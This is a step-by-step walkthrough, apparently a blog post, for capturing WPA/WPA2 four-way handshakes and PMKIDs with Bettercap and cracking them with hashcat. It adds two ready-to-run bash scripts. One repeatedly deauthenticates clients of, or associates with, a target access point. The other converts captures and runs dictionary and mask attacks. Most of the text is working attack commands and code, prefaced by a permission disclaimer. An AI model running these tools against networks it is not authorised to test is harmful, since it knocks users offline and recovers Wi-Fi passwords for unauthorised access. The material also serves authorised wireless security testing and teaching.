This is a walkthrough for capturing WPA/WPA2 4-way handshakes and PMKIDs with Bettercap and cracking them with Hashcat.


This is for educational purposes and is only to be performed on networks you have permission to test.


My notes on Wireless in general can be found here.

My notes on Hashcat can be found here.

This requires a WiFi adapter whose driver supports monitor mode (capturing raw 802.11 frames) and packet injection (sending the deauthentication and association frames used below). These are two separate capabilities, not two names for the same thing; iw list shows the interface modes a driver supports, and you want both before relying on an adapter for this.

I myself have and recommend these adapters:

Bettercap

Handshake

We need to find our interface (iw dev lists wireless interfaces) and put it into monitor mode. Running airmon-ng check kill first stops NetworkManager and wpa_supplicant, which otherwise keep resetting the card:

sudo airmon-ng start (interface name)

airmon-ng usually renames the interface when it switches modes (for example wlan0 becomes wlan0mon); use the new name in every command below.

Now we start Bettercap as root on the monitor-mode interface:

sudo bettercap -iface (interface)

We begin scanning for networks

wifi.recon on

We can also show the manufacturer of each AP (looked up from the OUI of its BSSID) when listing networks:

set wifi.show.manufacturer true

wifi.show

Lock recon to the target's channel so the adapter stops hopping and misses nothing on it, then (optionally) write every sniffed frame to a pcap file. Bettercap also saves captured handshakes and PMKIDs on its own to the file named by wifi.handshakes.file (~/bettercap-wifi-handshakes.pcap by default), so the sniffer pcap is a convenience rather than a requirement.

set wifi.recon.channel (Channel)

set net.sniff.verbose true

set net.sniff.output (SSID).pcap

net.sniff on

events.stream on

At this point we can simply wait for a device to connect to the network and capture the handshake, or we can speed things up by deauthenticating clients so they reconnect. Given an AP BSSID, wifi.deauth deauthenticates every client of that AP; given a client MAC instead, it deauthenticates only that station.

wifi.deauth (BSSID)

Once a client reconnects and completes the 4-way handshake, Bettercap reports the captured handshake in the event stream and writes it to its handshake pcap file. Hashcat can work from two consecutive messages (for example M2 and M3), but a complete four-message handshake is the safe target.

PMKID

The PMKID method is much simpler. Just like before, we find our interface, enable monitor mode, and start Bettercap with that interface.

We begin scanning for networks

wifi.recon on

We can also show the WiFi Manufacturer of the AP

set wifi.show.manufacturer true

wifi.show

To start the PMKID attack we simply run

wifi.assoc (BSSID)

This sends an association request to the AP; if the AP supports PMKID caching, it replies with the first EAPOL message of the 4-way handshake, whose RSN key data carries the PMKID. No client needs to be connected and no deauthentication frames are sent. Bettercap reports the received PMKID in the event stream and saves it to the same handshake pcap file. Not every AP returns a PMKID; if nothing shows up after a few attempts, fall back to the handshake method above.
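The handshake and PMKID procedures above, as one added example that is not code from the original post: a script that generates a Bettercap caplet for either attack and runs it. It uses Bettercap's wifi.handshakes.file parameter and its ticker module (which re-runs a command every few seconds, so wifi.deauth or wifi.assoc does not have to be retyped). The interface, BSSID, channel and output path are placeholders, and the assumption that airmon-ng renames the interface to <iface>mon is labelled in the code.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post. Builds a Bettercap caplet
# for either the handshake or the PMKID capture described above and runs it.
# Assumptions: airmon-ng and bettercap are installed, airmon-ng renames the
# interface to <iface>mon, and the target is a network you are allowed to test.
set -euo pipefail

# Emit the caplet (a file of Bettercap commands) for one target.
# mode: "handshake" (deauth clients, wait for the 4-way handshake)
#       or "pmkid"  (associate to the AP and wait for the PMKID).
# Bettercap's ticker module re-runs the attack command every few seconds.
gen_caplet() {
    local mode=$1 bssid=$2 channel=$3 outfile=$4 attack
    case "$mode" in
        handshake) attack="wifi.deauth $bssid" ;;
        pmkid)     attack="wifi.assoc $bssid" ;;
        *) echo "gen_caplet: mode must be handshake or pmkid" >&2; return 1 ;;
    esac
    cat <<EOF
set wifi.handshakes.file $outfile
set wifi.recon.channel $channel
set wifi.show.manufacturer true
wifi.recon on
events.stream on
set ticker.period 10
set ticker.commands "$attack"
ticker on
EOF
}

# Check that the adapter's driver advertises monitor mode (iw phy lists modes).
supports_monitor() {
    local phy
    phy=$(cat "/sys/class/net/$1/phy80211/name") || return 1
    iw phy "$phy" | grep '\* monitor' >/dev/null
}

# Put the adapter into monitor mode and run Bettercap with the caplet.
# Usage: run_capture wlan0 handshake AA:BB:CC:DD:EE:FF 6 /tmp/target.pcap
run_capture() {
    local iface=$1 mode=$2 bssid=$3 channel=$4 outfile=$5 caplet
    supports_monitor "$iface" || { echo "$iface: no monitor mode" >&2; return 1; }
    caplet=$(mktemp)
    gen_caplet "$mode" "$bssid" "$channel" "$outfile" > "$caplet"
    sudo airmon-ng check kill          # stop NetworkManager / wpa_supplicant
    sudo airmon-ng start "$iface"
    sudo bettercap -iface "${iface}mon" -caplet "$caplet"   # assumes the <iface>mon rename
    rm -f "$caplet"
}

# Only touch hardware when explicitly asked: ./capture.sh --run wlan0 pmkid AA:BB:CC:DD:EE:FF 6 out.pcap
if [ "${1:-}" = "--run" ]; then
    shift
    run_capture "$@"
fi
```

Running the script without --run only defines the functions, so gen_caplet can be used to preview the caplet before anything is transmitted; the handshake and PMKID runs differ only in the ticker command, and both end up in the pcap named by wifi.handshakes.file.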


Hashcracking with Hashcat

Whether the pcap holds a PMKID, a full handshake, or both, hashcat needs it converted to its 22000 format first. The converter is hcxpcapngtool from hcxtools (it reads both pcap and pcapng):

hcxpcapngtool -o CrackMe.22000 (capture file)

The output has one line per PMKID or handshake found; if the tool reports no usable entries, the capture is incomplete and needs to be redone.

Dictionary

If we want to use a dictionary attack, like using rockyou.txt for example

hashcat -a 0 -w 3 -m 22000 (hash file) (wordlist)

Depending on your hardware, the wordlist you chose, and the password, this may take some time. Press s for a status report, which shows the estimated time to completion and the Recovered line counting how many hashes have been cracked so far.

Once hashcat finishes, we can run the same command again with --show appended to print the cracked passwords. --show only reads hashcat's potfile, so the wordlist argument can be dropped.

Brute Force

If we want a brute-force (mask) attack rather than a dictionary attack, the command is similar:

hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l?l'

Each ?l position stands for one character drawn from the lowercase charset; replace the placeholders with whatever charsets and length fit the target. WPA/WPA2 passphrases are 8 to 63 characters long, so a mask shorter than eight positions can never match and only wastes time. To try several lengths in one run, add -i (--increment) together with --increment-min 8.

* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = (space) !"#$%&'()\*+,-./:;<=>?@\[\\]^\_\`{|}\~
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff
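The conversion and cracking steps above, as one added example that is not code from the original post: a script that wraps hcxpcapngtool and hashcat, reports whether each entry in the 22000 file came from a PMKID or a handshake, and builds masks that respect the 8 to 63 character WPA passphrase limit. hcxpcapngtool and hashcat are assumed installed; the file names are placeholders and the sample hash entries are constructed dummies with made-up MACs and key material, useful only to show the file layout.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: converts a capture to
# hashcat's 22000 format, reports what the hash file actually contains, and
# wraps the dictionary and mask attacks from the walkthrough.
# Assumptions: hcxpcapngtool and hashcat are installed; file names and the
# sample hash entries below are placeholders/constructed, not real captures.
set -euo pipefail

# Convert a pcap/pcapng capture (e.g. Bettercap's handshake file) to hc22000.
convert_capture() {
    local capture=$1 hashfile=$2
    hcxpcapngtool -o "$hashfile" "$capture"
}

# Decode a hex string ("546573744e6574") to text ("TestNet").
hex_to_ascii() {
    local hex=$1 out="" i
    for ((i = 0; i < ${#hex}; i += 2)); do
        out+=$(printf "\\x${hex:i:2}")
    done
    printf '%s' "$out"
}

# One line per entry: "<PMKID|EAPOL> <ESSID> <AP MAC>".
# hc22000 layout: WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_CLIENT*ESSID(hex)*ANONCE*EAPOL*MSGPAIR
# TYPE 01 = PMKID, TYPE 02 = 4-way handshake; hashcat -m 22000 cracks both,
# so this tells us which capture method produced each entry.
summarize_hc22000() {
    local hashfile=$1 proto type mic ap client essid_hex rest kind
    while IFS='*' read -r proto type mic ap client essid_hex rest; do
        [ "$proto" = "WPA" ] || continue
        case "$type" in
            01) kind=PMKID ;;
            02) kind=EAPOL ;;
            *)  kind=unknown ;;
        esac
        printf '%s %s %s\n' "$kind" "$(hex_to_ascii "$essid_hex")" "$ap"
    done < "$hashfile"
}

# Build a mask of N positions from one charset token (default ?l).
# WPA/WPA2 passphrases are 8..63 characters, so shorter masks can never hit.
build_mask() {
    local length=$1 charset=${2:-?l} mask="" i
    if [ "$length" -lt 8 ] || [ "$length" -gt 63 ]; then
        echo "build_mask: WPA passphrases are 8-63 characters" >&2
        return 1
    fi
    for ((i = 0; i < length; i++)); do mask+=$charset; done
    printf '%s' "$mask"
}

crack_dictionary() { hashcat -a 0 -w 3 -m 22000 "$1" "$2"; }                            # hashfile wordlist
crack_mask()       { hashcat -a 3 -w 3 -m 22000 "$1" "$(build_mask "$2" "${3:-?l}")"; } # hashfile length [charset]
show_cracked()     { hashcat -m 22000 "$1" --show; }                                     # reads the potfile only

# Constructed sample hash file: one PMKID entry and one handshake entry for
# made-up networks. The hex values are dummies and will not crack.
write_sample_hashfile() {
    cat > "$1" <<'EOF'
WPA*01*4d4fe7aac3a2cea35a5bfd2fe74c1e4a*001122334455*66778899aabb*546573744e6574***
WPA*02*5c2f0b1e0b7bc4a4b3c5cb0c2f0d4a9e*001122334455*ccddeeff0011*486f6d6557694669*0101010101010101010101010101010101010101010101010101010101010101*0203007502010a00*02
EOF
}

# Demo that needs neither hcxtools nor hashcat: ./crack.sh --demo
if [ "${1:-}" = "--demo" ]; then
    sample=$(mktemp)
    write_sample_hashfile "$sample"
    summarize_hc22000 "$sample"
    echo "mask for 8 lowercase: $(build_mask 8)"
    rm -f "$sample"
fi
```

A real run is convert_capture target.pcap target.22000, then summarize_hc22000 target.22000 to confirm the expected network is present, then crack_dictionary target.22000 rockyou.txt or crack_mask target.22000 8, and finally show_cracked target.22000. Checking the summary first avoids spending GPU hours on a file that only holds a neighbour's handshake.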

This covers the basics of cracking WPA hashes with hashcat, but it can get far more advanced, particularly when a rule set such as OneRuleToRuleThemStill (the maintained successor of OneRuleToRuleThemAll) is applied to a dictionary attack with -r, and when larger modern wordlists such as rockyou2021.txt are used.